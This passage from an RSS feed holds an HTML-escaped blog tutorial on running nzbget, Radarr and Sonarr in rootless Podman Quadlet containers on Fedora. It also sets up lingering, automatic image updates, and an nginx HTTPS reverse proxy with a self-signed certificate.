start it:&lt;/p&gt;&lt;div&gt;&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;systemctl --user daemon-reload
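# Optional check, added as a sketch rather than taken from the original post:
# ask the Quadlet generator to print the units it would create, so mistakes in
# nzbget.container show up before the service is started. The generator path
# is the usual Fedora location and is an assumption; adjust it if yours differs.
/usr/lib/systemd/system-generators/podman-system-generator --user --dryrun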
systemctl --user start nzbget&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If everything went well you should be able to access the nzbget web interface at &lt;code&gt;http://[server-ip]:6789&lt;/code&gt; and log in with the default credentials (&lt;code&gt;admin:tegbzn6789&lt;/code&gt;). At this point you should ensure that nzbget is using the correct paths, and of course you’ll need a news server.&lt;/p&gt;&lt;p&gt;Under &lt;strong&gt;settings &amp;gt; security&lt;/strong&gt; make sure to set &lt;strong&gt;ControlIP&lt;/strong&gt; to &lt;code&gt;0.0.0.0&lt;/code&gt;, and resolve any other issues outlined in the &lt;strong&gt;messages&lt;/strong&gt; section.&lt;/p&gt;&lt;h2&gt;Lingering
&lt;/h2&gt;&lt;p&gt;We also want to start nzbget automatically on boot. By default, rootless &lt;code&gt;systemd --user&lt;/code&gt; sessions only start when a user logs in and tear down upon logout. To force the system to initialize your specific user session at boot, we need “lingering” enabled. Run this command with administrative privileges:&lt;/p&gt;&lt;div&gt;&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;sudo loginctl enable-linger $USER&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2&gt;Radarr and Sonarr
&lt;/h2&gt;&lt;p&gt;Okay, time to move on to radarr. Create a file called &lt;code&gt;~/.config/containers/systemd/radarr.container&lt;/code&gt; with the following content:&lt;/p&gt;&lt;div&gt;&lt;pre&gt;&lt;code class=&quot;language-ini&quot;&gt;[Unit]
Description=Radarr
After=network-online.target

[Container]
Image=lscr.io/linuxserver/radarr:latest 
ContainerName=radarr

Environment=PUID=0
Environment=PGID=0
Environment=TZ=Europe/Rome

Network=arr.network
PublishPort=7878:7878
Volume=/mnt/storage/media/radarr:/config:Z
Volume=/mnt/storage/media/downloads:/downloads:z
Volume=/mnt/storage/media/Movies:/movies:z

AutoUpdate=registry

[Service]
Restart=always
TimeoutStartSec=900

[Install]
WantedBy=default.target&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The configuration is pretty much the same as nzbget, we just need to change the image, the container name, the ports and the volumes. The important thing is that we are using the same custom network (&lt;code&gt;Network=arr.network&lt;/code&gt;) so that radarr can talk to nzbget. Same as before note the use of &lt;code&gt;:Z&lt;/code&gt; and &lt;code&gt;:z&lt;/code&gt; for the volumes.&lt;/p&gt;&lt;p&gt;And finally sonarr. Create a file called &lt;code&gt;~/.config/containers/systemd/sonarr.container&lt;/code&gt; with the following content:&lt;/p&gt;&lt;div&gt;&lt;pre&gt;&lt;code class=&quot;language-ini&quot;&gt;[Unit]
Description=Sonarr
After=network-online.target

[Container]
Image=ghcr.io/linuxserver/sonarr:latest 
ContainerName=sonarr

Environment=PUID=0
Environment=PGID=0
Environment=TZ=Europe/Rome

Network=arr.network
PublishPort=8989:8989  
Volume=/mnt/storage/media/sonarr:/config:Z
Volume=/mnt/storage/media/downloads:/downloads:z
Volume=/mnt/storage/media/TV:/tv:z

AutoUpdate=registry

[Service]
Restart=always
TimeoutStartSec=900

[Install]
WantedBy=default.target&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We can now start both radarr and sonarr with the same commands we used for nzbget:&lt;/p&gt;&lt;div&gt;&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;systemctl --user daemon-reload
systemctl --user start radarr
systemctl --user start sonarr&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If everything went well you should be able to access the web interfaces at &lt;code&gt;http://[server-ip]:7878&lt;/code&gt; for radarr and &lt;code&gt;http://[server-ip]:8989&lt;/code&gt; for sonarr. You can then configure them to use the correct paths, and of course set up the indexers and the connection to nzbget.&lt;/p&gt;&lt;p&gt;When creating a new Download Client in radarr and sonarr, make sure to &lt;strong&gt;use the actual IP address of the server&lt;/strong&gt; (eg: &lt;code&gt;192.168.1.2&lt;/code&gt;). &lt;em&gt;localhost&lt;/em&gt; or &lt;em&gt;127.0.0.1&lt;/em&gt; &lt;strong&gt;won’t work&lt;/strong&gt;.&lt;/p&gt;&lt;p&gt;Congratulations, you now have nzbget, radarr and sonarr running in rootless podman containers that start on boot. To have it also update automatically we need one more step.&lt;/p&gt;&lt;h2&gt;Automatic Updates
&lt;/h2&gt;&lt;p&gt;Thanks to &lt;code&gt;AutoUpdate=registry&lt;/code&gt;, all containers are already configured to update automatically when a new image is available on the registry, but we still need to enable the &lt;code&gt;podman-auto-update.timer&lt;/code&gt; systemd timer to make it work. A timer suits me because my server is always on.&lt;/p&gt;&lt;p&gt;Run the following command:&lt;/p&gt;&lt;div&gt;&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;systemctl --user enable --now podman-auto-update.timer&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;That’s it, now your containers will be automatically updated when a new image is available. You can check the status of the timer with:&lt;/p&gt;&lt;div&gt;&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;systemctl --user status podman-auto-update.timer&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Automatic updates aren’t generally recommended: if it works, don’t touch it. But I like to live on the edge and I can always roll back to a previous image if something breaks.&lt;/p&gt;&lt;h2&gt;Bonus: Reverse Proxy with nginx
&lt;/h2&gt;&lt;p&gt;Everything seems to be working, but I want to access the services with nice URLs like &lt;code&gt;http://nzbget.cool.domain&lt;/code&gt; instead of &lt;code&gt;http://192.168.1.2:6789&lt;/code&gt;. To do that I set up a reverse proxy with nginx. It’s pretty straightforward, but –again– SELinux can be a bit of a pain.&lt;/p&gt;&lt;p&gt;I’m already running a full authoritative DNS server with &lt;code&gt;unbound&lt;/code&gt; so it’s easy for me to point custom domains at my server IP, but you can achieve the same result in multiple ways (like editing your &lt;code&gt;hosts&lt;/code&gt; file, using a different DNS server or even Pi-hole).&lt;/p&gt;&lt;p&gt;For unbound I added the following lines to my configuration:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;language-conf&quot;&gt;...
local-zone: &amp;quot;cool.domain.&amp;quot; static
local-data: &amp;quot;nzbget.cool.domain. IN A 192.168.1.2&amp;quot;
local-data: &amp;quot;radarr.cool.domain. IN A 192.168.1.2&amp;quot;
local-data: &amp;quot;sonarr.cool.domain. IN A 192.168.1.2&amp;quot;
...
local-data-ptr: &amp;quot;192.168.1.2 nzbget.cool.domain.&amp;quot;
local-data-ptr: &amp;quot;192.168.1.2 radarr.cool.domain.&amp;quot;
local-data-ptr: &amp;quot;192.168.1.2 sonarr.cool.domain.&amp;quot;
...&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Then I installed and enabled nginx with:&lt;/p&gt;&lt;pre&gt;&lt;code&gt;sudo dnf install nginx
sudo systemctl --now enable nginx&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;We also need to relax SELinux to allow nginx to make outbound connections. Run the following command:&lt;/p&gt;&lt;div&gt;&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;sudo setsebool -P httpd_can_network_connect 1&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;While we are at it, I also created a self-signed SSL certificate for the domain so I can access the services over HTTPS. To do that I ran the following command:&lt;/p&gt;&lt;div&gt;&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;openssl req -x509 -newkey rsa:4096 -sha512 -days 3650 -noenc -keyout cool.domain.key -out cool.domain.crt -subj &amp;quot;/CN=cool.domain&amp;quot; -addext &amp;quot;subjectAltName=DNS:cool.domain,DNS:*.cool.domain,IP:192.168.1.2&amp;quot;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Of course replace &lt;code&gt;cool.domain&lt;/code&gt; (can be anything, even made up) with your actual domain and &lt;code&gt;192.168.1.2&lt;/code&gt; with your server IP. That will generate a certificate valid for 10 years. Copy the .crt and .key files to a sensible location (eg: &lt;code&gt;/etc/nginx/certs/&lt;/code&gt;) and then inform SELinux about the new files with:&lt;/p&gt;&lt;div&gt;&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;sudo restorecon -Rv /etc/nginx/certs&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Finally we can create the nginx configuration for the reverse proxy. Create a file called &lt;code&gt;proxy.conf&lt;/code&gt; in &lt;code&gt;/etc/nginx/conf.d/&lt;/code&gt; with the following content:&lt;/p&gt;&lt;div&gt;&lt;pre&gt;&lt;code class=&quot;language-nginx&quot;&gt;server {
    listen 80;
    server_name nzbget.cool.domain;
    return 301 https://$host$request_uri;
}

server {
    listen       443 ssl;
    listen       [::]:443 ssl;
    http2        on;
    server_name  nzbget.cool.domain;

    ssl_certificate &amp;quot;/etc/nginx/certs/cool.domain.crt&amp;quot;;
    ssl_certificate_key &amp;quot;/etc/nginx/certs/cool.domain.key&amp;quot;;
    ssl_session_cache shared:SSL:1m;
    ssl_session_timeout  10m;
    ssl_ciphers PROFILE=SYSTEM;
    ssl_prefer_server_ciphers on;

    location / {
        proxy_pass http://127.0.0.1:6789;

        # Pass correct headers to NZBGet
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_set_header X-Forwarded-Proto $scheme;

        # Allow large file uploads via the web UI if necessary
        client_max_body_size 100M;
    }
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Repeat the same for radarr and sonarr, just changing the &lt;code&gt;server_name&lt;/code&gt; and the port in &lt;code&gt;proxy_pass&lt;/code&gt;. Reload nginx and you should be able to access the services with the nice URLs we set up.&lt;/p&gt;&lt;h2&gt;Conclusion
&lt;/h2&gt;&lt;p&gt;I’m not sure if this is the best way to set everything up but it seems to be working fine for me. I especially like that I don’t need to change the permissions on the shared volumes and my main user still has read/write access to the media files. I also have an NFS partition mounted using the same user and group so everything is integrated seamlessly.&lt;/p&gt;&lt;p&gt;If you have any suggestions or improvements drop me a &lt;a href=&quot;https://matt3o.com/about/&quot;&gt;message&lt;/a&gt; or find me on &lt;a href=&quot;https://mastodon.social/@cubiq&quot;&gt;Mastodon&lt;/a&gt; or &lt;a href=&quot;https://discord.gg/matt3o&quot;&gt;Discord&lt;/a&gt;.&lt;/p&gt;</content:encoded>
</item>
</channel>
</rss>
